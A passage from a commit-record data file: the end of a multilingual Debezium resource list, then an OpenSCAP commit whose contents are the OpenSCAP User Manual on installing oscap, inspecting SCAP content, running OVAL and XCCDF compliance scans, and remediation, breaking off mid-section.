\ud83c\udde9\ud83c\uddea https:\/\/blogs.zeiss.com\/digital-innovation\/de\/datenbankaenderungen-teil-1\/[Datenbank\u00e4nderungen erkennen und streamen mit Debezium und Apache Kafka (Teil 1) \u2013 Die Theorie] by Richard Mogwitz (blog post, German)\n* \ud83c\uddf5\ud83c\uddf1 https:\/\/wiadrodanych.pl\/big-data\/change-data-capture-mysql-debezium\/[Change Data Capture \u2013 Zmie\u0144 Baz\u0119 W Strumie\u0144 (Debezium)] by Maciej Szymczyk (blog post, Polish)\n* \ud83c\uddf7\ud83c\uddfa https:\/\/habr.com\/ru\/company\/flant\/blog\/523510\/[\u0417\u043d\u0430\u043a\u043e\u043c\u0441\u0442\u0432\u043e \u0441 Debezium \u2014 CDC \u0434\u043b\u044f Apache Kafka] (blog post, Russian)\n* \ud83c\udde8\ud83c\uddf3 https:\/\/mp.weixin.qq.com\/s\/Mfn-fFegb5wzI8BIHhNGvQ[\"Flink SQL CDC \u4e0a\u7ebf\uff01\u6211\u4eec\u603b\u7ed3\u4e86 13 \u6761\u751f\u4ea7\u5b9e\u8df5\u7ecf\u9a8c\"] by Zeng Qingdong (blog post, Mandarin)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/medium.com\/@viavarejo.productdevelopment\/uma-estrat%C3%A9gia-de-cdc-com-debezium-e27aa945d7b0[\"Uma estrat\u00e9gia de CDC com Debezium\"] by Jo\u00e3o Gabriel Mello, Brunno Lira and Marcelo Costa (blog post, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/www.infoq.com\/br\/presentations\/postgresql-ao-datalake-utilizando-kafkadebezium\/[Do PostgreSQL ao Data Lake utilizando Kafka-Debezium] by Paulo Singaretti, PGConf S\u00e3o Paulo 2019 (conference session recording, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/www.youtube.com\/watch?v=jtVD-HIJG9M&feature=youtu.be[Quarkus #25: Monitoramento de qualquer opera\u00e7\u00e3o em uma tabela do banco de dados com Debezium] by Vinicius Ferraz (sceen cast, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/elo7.dev\/cdc-parte-1\/[\"Introdu\u00e7\u00e3o ao Change Data Capture (CDC)\"] by Renato Sardinha (blog post, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/medium.com\/@singaretti\/streaming-de-dados-do-postgresql-utilizando-kafka-debezium-v2-d49f46d70b37[\"Streaming de dados (do PostgreSQL) utilizando Kafka|Debezium (v2)\"] by Paulo Singaretti (blog post, Portuguese)\n* \ud83c\uddeb\ud83c\uddf7 https:\/\/www.synaltic.fr\/blog\/conference-poss-11-12-2019\/[Conf\u00e9rence POSS 2019 : Streaming Processing avec Debezium] by Yabir Canario De la Mota & Charly Clairmont (blog post, French)\n* \ud83c\udde9\ud83c\uddea https:\/\/www.heise.de\/developer\/artikel\/Im-Gespraech-Gunnar-Morling-ueber-Debezium-und-CDC-4513865.html[Im Gespr\u00e4ch: Gunnar Morling \u00fcber Debezium und CDC]; interview with Thorben Janssen for heise.de (podcast, German)\n* \ud83c\uddee\ud83c\udde9 https:\/\/medium.com\/easyread\/ingest-data-dari-mysql-database-ke-bigquery-dengan-apache-kafka-dan-debezium-f519e197f39c[\"Ingesting Data dari MySQL Database ke BigQuery dengan Apache Kafka dan Debezium\"] by Ilyas Ahsan (blog post, Indonesian)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/19\/debezium-camel-integration\/[Debezium\u3068Apache Camel\u306e\u30a4\u30f3\u30c6\u30b0\u30ec\u30fc\u30b7\u30e7\u30f3\u30b7\u30ca\u30ea\u30aa] (Japanese translation of the blog post link:\/blog\/2020\/02\/19\/debezium-camel-integration\/[Integration Scenarios with Debezium and Apache Camel] by Jiri Pechanec)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/10\/event-sourcing-vs-cdc\/[\u30de\u30a4\u30af\u30ed\u30b5\u30fc\u30d3\u30b9\u306e\u305f\u3081\u306e\u5206\u6563\u30c7\u30fc\u30bf \u301c \u30a4\u30d9\u30f3\u30c8\u30bd\u30fc\u30b7\u30f3\u30b0 vs \u30c1\u30a7\u30f3\u30b8\u30c7\u30fc\u30bf\u30ad\u30e3\u30d7\u30c1\u30e3] (Japanese translation of the blog post link:\/blog\/2020\/02\/10\/event-sourcing-vs-cdc\/[Distributed Data for Microservices \u2014 Event Sourcing vs. Change Data Capture] by Eric Murphy)\n* \ud83c\uddf5\ud83c\uddf0 https:\/\/www.youtube.com\/playlist?list=PLYIDB7b23nqOcp-Gnff_KfZbp8PK4Z6jg[Change Data Capture Mechanism using Apache Kafka, Debezium and Postgres in Urdu] By Waqas Dilawar\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6f84abae572ffa430814a7a119e42f41f020e75","subject":"Fix missing 'oscap info' argument","message":"Fix missing 'oscap info' argument\n","repos":"OpenSCAP\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap","old_file":"docs\/manual\/manual.adoc","new_file":"docs\/manual\/manual.adoc","new_contents":"= OpenSCAP User Manual\n:imagesdir: .\/images\n:workbench_url: https:\/\/www.open-scap.org\/tools\/scap-workbench\/\n:sce_web: https:\/\/www.open-scap.org\/features\/other-standards\/sce\/\n:openscap_web: https:\/\/open-scap.org\/\n:oscap_git: https:\/\/github.com\/OpenSCAP\/openscap\n:ssg_git: https:\/\/github.com\/OpenSCAP\/scap-security-guide\n:xmlsec: https:\/\/www.aleksey.com\/xmlsec\/\n:xslt: http:\/\/www.w3.org\/TR\/xslt\n:xsl: http:\/\/www.w3.org\/Style\/XSL\/\n:ssg: http:\/\/open-scap.org\/security-policies\/scap-security-guide\/\n:xccdf: http:\/\/scap.nist.gov\/specifications\/xccdf\/\n:xccdf_1-2: http:\/\/scap.nist.gov\/specifications\/xccdf\/#resource-1.2\n:scap: http:\/\/scap.nist.gov\/\n:nist: http:\/\/www.nist.gov\/\n:cpe: https:\/\/cpe.mitre.org\/\n:cce: https:\/\/cce.mitre.org\/\n:oval: https:\/\/oval.mitre.org\/\n:pci_dss: https:\/\/www.pcisecuritystandards.org\/security_standards\/\n:usgcb: http:\/\/usgcb.nist.gov\/\n:stig: http:\/\/iase.disa.mil\/stigs\/Pages\/index.aspx\n:scap_1-2: http:\/\/scap.nist.gov\/revision\/1.2\/\n:scap_1-1: http:\/\/scap.nist.gov\/revision\/1.1\/index.html\n:scap_1-0: http:\/\/scap.nist.gov\/revision\/1.0\/\n:nvd: https:\/\/web.nvd.nist.gov\/view\/ncp\/repository\n:toc:\n:toc-placement: preamble\n:numbered:\n\nimage::vertical-logo.png[align=\"center\"]\n\ntoc::[]\n\n== Introduction\n\nThis documentation provides information about a command-line tool called\n `oscap` and its most common operations. With `oscap` you can check\nsecurity configuration settings of a system, and examine the system for signs of\na compromise by using rules based on standards and specifications. The\n `oscap` uses {scap}[SCAP] which is a line of specifications maintained by\nthe {nist}[NIST] which was created to provide a standardized approach for\nmaintaining system security. New specifications are governed by NIST's SCAP\nhttp:\/\/scap.nist.gov\/timeline.html[Release cycle] in order to provide a\nconsistent and repeatable revision workflow. The `oscap` mainly processes\nthe {xccdf}[XCCDF] which is a standard way of expressing a checklist content and\ndefines security checklists. It also combines with other specifications such as\n{cpe}[CPE], {cce}[CCE] and {oval}[OVAL] to create a SCAP-expressed checklist that\ncan be processed by SCAP-validated products. For more information about the\nSCAP please refer to http:\/\/open-scap.org\/features\/standards\/[SCAP Standards].\n\nThe `oscap` tool is a part of the {openscap_web}[OpenSCAP] project. If you're\ninterested in a graphical alternative to this tool please visit\n{workbench_url}[SCAP Workbench] page.\n\n\nWe will use the {ssg}[SCAP Security Guide] project to provide us the SCAP\ncontent. It provides security policies written in a form of SCAP documents\ncovering many areas of computer security, and it implements security guidances\nrecommended by respected authorities, namely {pci_dss}[PCI DSS], {stig}[STIG], and\n{usgcb}[USGCB].\n\nYou can also generate your own SCAP content if you have an understanding of at least\nXCCDF or OVAL. XCCDF content is also frequently published online under open\nsource licenses, and you can customize this content to suit your needs instead.\nSCAP Workbench is a great tool to do the customization.\n\nThe Basic oscap usage section of the manual presents how to install the tool\nand SCAP content and how to use those to examine a SCAP content, perform a\nconfiguration scan or how to automatically remediate your machines.\n\nThird section provides cover advanced topic like validation, signing and\ntransformation of SCAP content, generating reports and guides and also some\ninformation about CPE applicability.\n\n== Basic oscap Usage\n\nIf you want to perform configuration or vulnerability scans of a local system\nthen the following must be available:\n\n . A tool (`oscap` or SCAP Workbench)\n . SCAP content (XCCDF, OVAL...)\n\n=== Installation\n\nYou can either build the OpenSCAP library and the `oscap` tool from\n{oscap_git}[source] (for details please refer to the <<..\/developer\/developer.adoc#,Developer Documentation>>),\nor you can use an existing build for your Linux distribution. Use the\nfollowing yum command if you want to install the oscap tool on your\nFedora or Red Hat Enterprise Linux distribution:\n\n----------------------------\n# yum install openscap-scanner\n----------------------------\n\nNOTE: If the `openscap-scanner` is not available install\n `openscap-utils` instead.\n\nBefore you can start using the `oscap` tool you must have some SCAP content\non your system. You can download it from the respective web site but we\nwill use the SSG project in the following sections. You can build it from the\n{ssg_git}[source] or you can install it using a package management system:\n\n----------------------------\n# yum install scap-security-guide\n----------------------------\n\nThe SCAP content will be installed in *__\/usr\/share\/xml\/scap\/ssg\/content\/__*.\n\nWhen the SCAP content is imported or installed on your system, `oscap` can\nprocess the content by specifying the file path to the content. The `oscap`\nsupports SCAP {scap_1-2}[1.2] and is backward compatible with SCAP\n{scap_1-1}[1.1] and SCAP {scap_1-0}[1.0]. No special treatment is required in\norder to import and process earlier versions of the SCAP content.\n\nTo display the version of oscap, supported specifications, built-in CPE\nnames, and supported OVAL objects, type the following command:\n\n----------\n$ oscap -V\n----------\n\n=== Displaying Information about SCAP Content\nOne of the capabilities of `oscap` is to display information about the SCAP\ncontents within a file. Running the `oscap info` command allows the\nexamination of the internal structure of a SCAP document and displays\ninformation such as the document type, specification version, status, the date\nthe document was published (**Generated**) and the date the document was copied to\nfile system (**Imported**). When examining an XCCDF document or a SCAP data stream,\ngenerally, the most useful information is about profiles, checklists, and\nstreams.\n\nThe following example demonstrates usage and sample output of the\ncommand when target is SCAP data stream:\n\n----\n$ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\nDocument type: Source Data Stream\nImported: 2016-08-10T20:49:16\n\nStream: scap_org.open-scap_datastream_from_xccdf_ssg-rhel7-xccdf-1.2.xml\nGenerated: (null)\nVersion: 1.2\nChecklists:\n Ref-Id: scap_org.open-scap_cref_ssg-rhel7-xccdf-1.2.xml\n Status: draft\n Generated: 2016-08-10\n Resolved: true\n Profiles:\n xccdf_org.ssgproject.content_profile_standard\n xccdf_org.ssgproject.content_profile_pci-dss\n xccdf_org.ssgproject.content_profile_C2S\n xccdf_org.ssgproject.content_profile_rht-ccp\n xccdf_org.ssgproject.content_profile_common\n xccdf_org.ssgproject.content_profile_stig-rhel7-workstation-upstream\n xccdf_org.ssgproject.content_profile_stig-rhel7-server-gui-upstream\n xccdf_org.ssgproject.content_profile_stig-rhel7-server-upstream\n xccdf_org.ssgproject.content_profile_ospp-rhel7-server\n xccdf_org.ssgproject.content_profile_nist-cl-il-al\n xccdf_org.ssgproject.content_profile_cjis-rhel7-server\n Referenced check files:\n ssg-rhel7-oval.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n ssg-rhel7-ocil.xml\n system: http:\/\/scap.nist.gov\/schema\/ocil\/2\n http:\/\/www.redhat.com\/security\/data\/oval\/Red_Hat_Enterprise_Linux_7.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\nChecks:\n Ref-Id: scap_org.open-scap_cref_ssg-rhel7-oval.xml\n Ref-Id: scap_org.open-scap_cref_ssg-rhel7-ocil.xml\n Ref-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-oval.xml\n Ref-Id: scap_org.open-scap_cref_output--ssg-rhel7-oval.xml\nDictionaries:\n Ref-Id: scap_org.open-scap_cref_output--ssg-rhel7-cpe-dictionary.xml\n----\n\nand when XCCDF document is examined:\n\n----\n$ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-xccdf.xml\nDocument type: XCCDF Checklist\nChecklist version: 1.1\nImported: 2016-08-10T20:49:16\nStatus: draft\nGenerated: 2016-08-10\nResolved: true\nProfiles:\n standard\n pci-dss\n C2S\n rht-ccp\n common\n stig-rhel7-workstation-upstream\n stig-rhel7-server-gui-upstream\n stig-rhel7-server-upstream\n ospp-rhel7-server\n nist-cl-il-al\n cjis-rhel7-server\nReferenced check files:\n ssg-rhel7-oval.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n ssg-rhel7-ocil.xml\n system: http:\/\/scap.nist.gov\/schema\/ocil\/2\n http:\/\/www.redhat.com\/security\/data\/oval\/Red_Hat_Enterprise_Linux_7.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n----\n\n**Document type** describes what format the file is in. Common types include\nXCCDF, OVAL, Source Data Stream and Result Data Stream.\n\n**Checklist version** is the XCCDF version only shown for XCCDF files. Common\nvalues are 1.1 and 1.2.\n\n**Imported** is the date the file was imported for use with OpenSCAP. Since\nOpenSCAP uses the local filesystem and has no proprietary database format\nthe imported date is the same as file modification date.\n\n**Status** is the XCCDF Benchmark status. Common values include \"accepted\",\n\"draft\", \"deprecated\" and \"incomplete\". Please refer to the XCCDF specification\nfor details. This is only shown for XCCDF files.\n\n**Generated** date is the date the file was created \/ generated. This date\nis shown for XCCDF files and Checklists and is sourced from the XCCDF **Status**\nelement.\n\n**Checklists** lists available checklists incorporated in the Data Stream that\nyou can use for the `--benchmark-id` command line attribute with `oscap xccdf\neval`. Also each checklist has the detailed information printed.\n\n**Profiles** lists available profile IDs that you can use for the `--profile`\ncommand line attribute with `oscap xccdf eval`.\n\n==== More Information about Result Files (XCCDF and ARF)\n\n`oscap info` is less helpful with XCCDF results and ARF files. Two important\ndates that are commonly requested are the evaluation start and end dates.\n\nTo look them up in the XCCDF result file, open the file and look for the\nTestResult element. The **start-time** and **end-time** attributes contain the evaluation\ntimes and dates.\n\n----\n<TestResult id=\"xccdf_org.open-scap_testresult_common\"\n start-time=\"2017-01-21T19:16:28\" end-time=\"2017-01-21T19:17:35\">\n----\n\nTo look up the dates in ARF file open the file and again look for the TestResult\nelements. The elements will be located in the arf:report elements.\n\n----\n<arf:reports>\n <arf:report id=\"xccdf1\">\n <arf:content>\n <TestResult xmlns=\"http:\/\/checklists.nist.gov\/xccdf\/1.2\"\n id=\"xccdf_org.open-scap_testresult_xccdf_org.ssgproject.content_profile_stig-rhel7-server-upstream\"\n start-time=\"2017-01-20T14:30:18\" end-time=\"2017-01-20T14:36:32\">\n----\n\nYou can also find both dates in a HTML report, table **Evaluation\ncharacteristics**. To generate HTML report from XCCDF result or ARF, use\n`oscap xccdf generate report` command.\n\n=== Scanning with OSCAP\nThe main goal of the `oscap` tool is to perform configuration and\nvulnerability scans of a local system. Oscap is able to evaluate both\nXCCDF benchmarks and OVAL definitions and generate the appropriate\nresults. Please note that SCAP content can be provided either in a\nsingle file (as an OVAL file or SCAP Data Stream), or as multiple\nseparate XML files. The following examples distinguish between these\napproaches.\n\n==== OVAL\nThe SCAP document can have a form of a single OVAL file (an OVAL\nDefinition file). The `oscap` tool processes the OVAL Definition file\nduring evaluation of OVAL definitions. It collects system\ninformation, evaluates it and generates an OVAL Result file. The result\nof evaluation of each OVAL definition is printed to standard output\nstream. The following examples describe the most common scenarios\ninvolving an OVAL Definition file.\n\n* To evaluate all definitions within the given OVAL Definition file, run\nthe following command:\n----------------------------------------------------------\n$ oscap oval eval --results oval-results.xml scap-oval.xml\n----------------------------------------------------------\nWhere *scap-oval.xml* is the OVAL Definition file and *oval-results.xml*\nis the OVAL Result file.\n\n* The following is an example of evaluating one particular definition\nwithin the given OVAL Definition file:\n----------------------------------------------------------------------------------\n$ oscap oval eval --id oval:rhel:def:1000 --results oval-results.xml scap-oval.xml\n----------------------------------------------------------------------------------\nWhere the OVAL definition being evaluated is defined by the\n*oval:rhel:def:1000* string, *scap-oval.xml* is the OVAL Definition file\nand *oval-results.xml* is the OVAL Result file.\n\n* To evaluate all definitions from the OVAL component that are part of a\nparticular data stream within a SCAP data stream collection, run the\nfollowing command:\n---------------------------------------------------------------------------------------------------\n$ oscap oval eval --datastream-id ds.xml --oval-id xccdf.xml --results oval-results.xml scap-ds.xml\n---------------------------------------------------------------------------------------------------\nWhere *ds.xml* is the given data stream, *xccdf.xml* is an XCCDF file\nspecifying the OVAL component, *oval-results.xml* is the OVAL Result\nfile, and *scap-ds.xml* is a file representing the SCAP data stream\ncollection.\n\n\nWhen the SCAP content is represented by multiple XML files, the OVAL\nDefinition file can be distributed along with the XCCDF file. In such a\nsituation, OVAL Definitions may depend on variables that are exported\nfrom the XCCDF file during the scan, and separate evaluation of the OVAL\ndefinition(s) would produce misleading results. Therefore, any external\nvariables has to be exported to a special file that is used during the\nOVAL definitions evaluation. The following commands are examples of this\nscenario:\n\n----\n$ oscap xccdf export-oval-variables \\\n--profile united_states_government_configuration_baseline \\\nusgcb-rhel5desktop-xccdf.xml\n----\n----\n$ oscap oval eval \\\n--variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml \\\n--results usgcb-results-oval.xml\nusgcb-rhel5desktop-oval.xml\n----\nWhere *united_states_government_configuration_baseline* represents a\nprofile in the XCCDF document, *usgcb-rhel5desktop-xccdf.xml* is a file\nspecifying the XCCDF document, *usgcb-rhel5desktop-oval.xml* is the OVAL\nDefinition file, *usgcb-rhel5desktop-oval.xml-0.variables-0.xml* is the\nfile containing exported variables from the XCCDF file, and\n*usgcb-results-oval.xml* is the the OVAL Result file.\n\nAn OVAL directives file can be used to control whether results should be \"thin\" or \"full\".\nThis file can be loaded by OpenSCAP using *--directives <file>* option.\n\nExample of an OVAL directive file which enables thin results instead of\nfull results:\n\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<oval_directives\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xmlns:oval=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-common-5\"\n xmlns:oval-res=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-results-5\"\n xmlns=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-directives-5\"\n xsi:schemaLocation=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-results-5\n oval-results-schema.xsd http:\/\/oval.mitre.org\/XMLSchema\/oval-common-5\n oval-common-schema.xsd http:\/\/oval.mitre.org\/XMLSchema\/oval-directives-5\n oval-directives-schema.xsd\">\n <generator>\n <oval:product_name>OpenSCAP<\/oval:product_name>\n <!-- make sure the OVAL version matches your input -->\n <oval:schema_version>5.8<\/oval:schema_version>\n <oval:timestamp>2017-02-04T00:00:00<\/oval:timestamp>\n <\/generator>\n <directives include_source_definitions=\"true\">\n <oval-res:definition_true reported=\"true\" content=\"thin\"\/>\n <oval-res:definition_false reported=\"true\" content=\"thin\"\/>\n <oval-res:definition_unknown reported=\"true\" content=\"thin\"\/>\n <oval-res:definition_error reported=\"true\" content=\"thin\"\/>\n <oval-res:definition_not_evaluated reported=\"true\" content=\"thin\"\/>\n <oval-res:definition_not_applicable reported=\"true\" content=\"thin\"\/>\n <\/directives>\n<\/oval_directives>\n----\n\nIf your use-case requires thin OVAL results you most likely also want\nto omit system characteristics. You can use the *--without-syschar*\noption to that effect.\n\nUsage of OVAL directives file when scanning a plain OVAL file:\n\n---------------------------------------------------------------------------------------------------\n$ oscap oval eval --directives directives.xml --without-syschar --results oval-results.xml oval.xml\n---------------------------------------------------------------------------------------------------\n\nUsage of OVAL directives file when scanning OVAL component from a Source DataStream:\n\n---------------------------------------------------------------------------------------------------\n$ oscap oval eval --directives directives.xml --without-syschar --datastream-id ds.xml --oval-id oval.xml --results oval-results.xml scap-ds.xml\n---------------------------------------------------------------------------------------------------\n\nIt is not always clear which OVAL file will be used when multiple files\nare distributed. In case you are evaluating an XCCDF file you can use:\n\n---------------------------------------------------------------------------------------------------\n$ oscap info ssg-rhel7-xccdf.xml\nDocument type: XCCDF Checklist\nChecklist version: 1.1\nImported: 2017-01-20T14:20:43\nStatus: draft\nGenerated: 2017-01-19\nResolved: true\nProfiles:\n standard\n pci-dss\n C2S\n rht-ccp\n common\n stig-rhel7-workstation-upstream\n stig-rhel7-server-gui-upstream\n stig-rhel7-server-upstream\n stig-rhevh-upstream\n ospp-rhel7-server\n nist-cl-il-al\n cjis-rhel7-server\n docker-host\n nist-800-171-cui\nReferenced check files:\n ssg-rhel7-oval.xml\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n ssg-rhel7-ocil.xml\n system: http:\/\/scap.nist.gov\/schema\/ocil\/2\n https:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-RHEL7.xml.bz2\n system: http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\n---------------------------------------------------------------------------------------------------\n\nIn the output you can see all referenced check files. In this case we see\nthat `ssg-rhel7-oval.xml` is referenced. To see contents of this file you\ncan open it in a text editor.\n\nYou can use `oscap info` with Source DataStream files as well. Source\nDataStream will often reference OVAL files that are bundled in it.\nIt is also possible to extract OVAL files from Source DataStream through `oscap ds sds-split`.\n\n---------------------------------------------------------------------------------------------------\n$ oscap ds sds-split ssg-rhel7-ds.xml extracted\/\n$ ls -1 extracted\/\nscap_org.open-scap_cref_output--ssg-rhel7-cpe-dictionary.xml\nscap_org.open-scap_cref_ssg-rhel7-xccdf-1.2.xml\nssg-rhel7-cpe-oval.xml\nssg-rhel7-ocil.xml\nssg-rhel7-oval.xml\n---------------------------------------------------------------------------------------------------\n\nAfter splitting the Source DataStream you can inspect OVAL and XCCDF files\nindividually using a text editor. Keep in mind that this is only an example\nand filenames depend on contents of the DataStream you are splitting and that\nyou can also inspect XCCDF and OVAL content directly in Source DataStream\nor Result DataStream.\n\n==== XCCDF\nWhen evaluating an XCCDF benchmark, `oscap` usually processes an XCCDF\nfile, an OVAL file and the CPE dictionary. It performs system\nanalysis and produces XCCDF results based on this analysis. The results\nof the scan do not have to be saved in a separate file but can be\nattached to the XCCDF file. The evaluation result of each XCCDF rule\nwithin an XCCDF checklist is printed to standard output stream. The CVE\nand CCE identifiers associated with the rules are printed as well. The\nfollowing is a sample output for a single XCCDF rule:\n\n----\nTitle Verify permissions on 'group' file\nRule usgcb-rhel5desktop-rule-2.2.3.1.j\nIdent CCE-3967-7\nResult pass\n----\n\nThe meaning of results is defined by https:\/\/csrc.nist.gov\/CSRC\/media\/Publications\/nistir\/7275\/rev-4\/final\/documents\/nistir-7275r4_updated-march-2012_clean.pdf[XCCDF Specification].\nThis table lists the possible results of a single rule:\n\n.XCCDF results\n|===\n|Result |Description |Example Situation\n\n|pass\n|The target system or system component satisfied all the conditions of the rule.\n|\n\n|fail\n|The target system or system component did not satisfy all the conditions of the rule.\n|\n\n|error\n|The checking engine could not complete the evaluation, therefore the status of the target\u2019s compliance with the rule is not certain.\n|OpenSCAP was run with insufficient privileges and could not gather all of the necessary information.\n\n|unknown\n|The testing tool encountered some problem and the result is unknown.\n|OpenSCAP was unable to interpret the output of the checking engine (the output has no meaning to OpenSCAP).\n\n|notapplicable\n|The rule was not applicable to the target of the test.\n|The rule might have been specific to a different version of the target OS, or it might have been a test against a platform feature that was not installed.\n\n|notchecked\n|The rule was not evaluated by the checking engine. This status is designed for rules that have no <xccdf:check> elements or that correspond to an unsupported checking system. It may also correspond to a status returned by a checking engine if the checking engine does not support the indicated check code.\n|The rule does not reference any OVAL check.\n\n|notselected\n|The rule was not selected in the benchmark. OpenSCAP does not display rules that were not selected.\n|The rule exists in the benchmark, but is not a part of selected profile.\n\n|informational\n|The rule was checked, but the output from the checking engine is simply information for auditors or administrators; it is not a compliance category. This status value is designed for rules whose main purpose is to extract information from the target rather than test the target.\n|\n\n|fixed\n|The rule had failed, but was then fixed by automated remediation.\n|\n|===\n\nThe CPE dictionary is used to determine whether the content is\napplicable on the target platform or not. Any content that is not\napplicable will result in each relevant XCCDF rule being evaluated to\n\"notapplicable\".\n\nThe following examples show the most common scenarios of XCCDF benchmark\nevaluation:\n\n* To evaluate a specific profile in an XCCDF file run this command:\n\n----\n$ oscap xccdf eval --profile Desktop --results xccdf-results.xml --cpe cpe-dictionary.xml scap-xccdf.xml\n----\n\nWhere *scap-xccdf.xml* is the XCCDF document, *Desktop* is the selected\nprofile from the XCCDF document, *xccdf-results.xml* is a file storing\nthe scan results, and *cpe-dictionary.xml* is the CPE dictionary.\n\n* You can additionaly add `--rule` option to the above command to evaluate\na specific rule:\n\n----\n$ oscap xccdf eval --profile Desktop --rule ensure_gpgcheck_globally_activated --results xccdf-results.xml --cpe cpe-dictionary.xml scap-xccdf.xml\n----\n\nWhere *ensure_gpgcheck_globally_activated* is the only rule from the *Desktop*\nprofile which will be evaluated.\n\n==== Source DataStream\nCommonly, all required input files are bundled together in Source DataStream.\nScanning using Source DataStream is also handled by `oscap xccdf eval` command,\nwith some additional parameters available to determine which of the bundled\nbenchmarks should be performed.\n\n* To evaluate a specific XCCDF benchmark that is part of a DataStream\nwithin a SCAP DataStream collection, run the following command:\n\n----\n$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP DataStream\ncollection, *ds.xml* is the particular DataStream, *xccdf.xml* is ID of\nthe component-ref pointing to the desired XCCDF document, and\n*xccdf-results.xml* is a file containing the scan results.\n\nNOTE: If you omit `--datastream-id` on the command line, the first data\nstream from the collection will be used. If you omit `--xccdf-id`, the\nfirst component from the checklists element will be used. If you omit\nboth, the first DataStream that has a component in the checklists\nelement will be used - the first component in its checklists element\nwill be used.\n\n\n* (Alternative, not recommended) To evaluate a specific XCCDF benchmark\nthat is part of a DataStream within a SCAP DataStream collection run\nthe following command:\n\n--------------------------------------------------------------------------------------\n$ oscap xccdf eval --benchmark-id benchmark_id --results xccdf-results.xml scap-ds.xml\n--------------------------------------------------------------------------------------\n\nWhere *scap-ds.xml* is a file representing the SCAP DataStream\ncollection, *benchmark_id* is a string matching the \"id\" attribute of\nxccdf:Benchmark containing in a component, and *xccdf-results.xml* is a\nfile containing the scan results.\n\n==== Result DataStream (ARF)\n\nIn the examples above we are generating XCCDF result files using the `--results`\ncommand-line argument. You can use `--results-arf` to generate a Result DataStream\n(also called ARF - Asset Reporting Format) XML instead.\n\n--------------------------------------------------------------------------------------\n$ oscap xccdf eval --benchmark-id benchmark_id --results-arf arf-results.xml scap-ds.xml\n--------------------------------------------------------------------------------------\n\n==== Result STIG Viewer\n\nIf you want to import the XCCDF scan results to DISA STIG Viewer but your Rule IDs don't\nmatch the DISA's ones, you can use the `--stig-viewer` command-line argument along with\na special reference in your Rules to generate XCCDF result files that can be imported by\nDISA STIG Viewer.\n\n--------------------------------------------------------------------------------------\n$ oscap xccdf eval --profile stig-rhel7-disa --stig-viewer results-stig.xml ssg-rhel7-ds.xml\n--------------------------------------------------------------------------------------\n\nEach rule in the input XCCDF must contain a reference to its STIG Rule ID, and its \nhref attribute must be exactly `http:\/\/iase.disa.mil\/stigs\/Pages\/stig-viewing-guidance.aspx`.\n\nFor example:\n----\n<Rule id=\"rpm_verify_permissions\">\n ...\n <reference href=\"http:\/\/iase.disa.mil\/stigs\/Pages\/stig-viewing-guidance.aspx\">SV-86473r2_rule<\/reference>\n ...\n<\/Rule>\n----\n\nFor more information on DISA STIG Viewer click link:http:\/\/iase.disa.mil\/stigs\/Pages\/stig-viewing-guidance.aspx[here].\n\n=== Remediate System\nOpenSCAP allows to automatically remediate systems that have been found in a\nnon-compliant state. For system remediation, an XCCDF file with instructions is\nrequired. The _scap-security-guide_ package contains certain remediation\ninstructions.\n\nSystem remediation consists of the following steps:\n\n . `oscap` performs a regular XCCDF evaluation.\n . An assessment of the results is performed by evaluating the OVAL definitions.\n Each rule that has failed is marked as a candidate for remediation.\n . `oscap` searches for an appropriate fix element, resolves it, prepares the\n environment, and executes the fix script.\n . Any output of the fix script is captured by `oscap` and stored within the\n *rule-result* element. The return value of the fix script is stored as well.\n . Whenever `oscap` executes a fix script, it immediately evaluates the OVAL\n definition again (to verify that the fix script has been applied correctly).\n During this second run, if the OVAL evaluation returns success, the result of\n the rule is *fixed*, otherwise it is an *error*.\n . Detailed results of the remediation are stored in an output XCCDF file. It\n contains two *TestResult* elements. The first *TestResult* element represents the\n scan prior to the remediation. The second *TestResult* is derived from the first\n one and contains remediation results.\n\nThere are three modes of operation of `oscap` with regard to remediation:\nonline, offline, and review.\n\n==== Online Remediation\nOnline remediation executes fix elements at the time of scanning. Evaluation and\nremediation are performed as a part of a single command.\n\nTo enable online remediation, use the `--remediate` command-line option. For\nexample, to execute online remediation using the _scap-security-guide_ package,\nrun:\n\n----\n$ oscap xccdf eval --remediate --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\nThe output of this command consists of two sections. The first section shows the\nresult of the scan prior to the remediation, and the second section shows the\nresult of the scan after applying the remediation. The second part can contain\nonly *fixed* and *error* results. The *fixed* result indicates that the scan performed\nafter the remediation passed. The *error* result indicates that even after\napplying the remediation, the evaluation still does not pass.\n\n==== Offline Remediation\nOffline remediation allows you to postpone fix execution. In first step, the\nsystem is only evaluated, and the results are stored in a *TestResult* element in\nan XCCDF 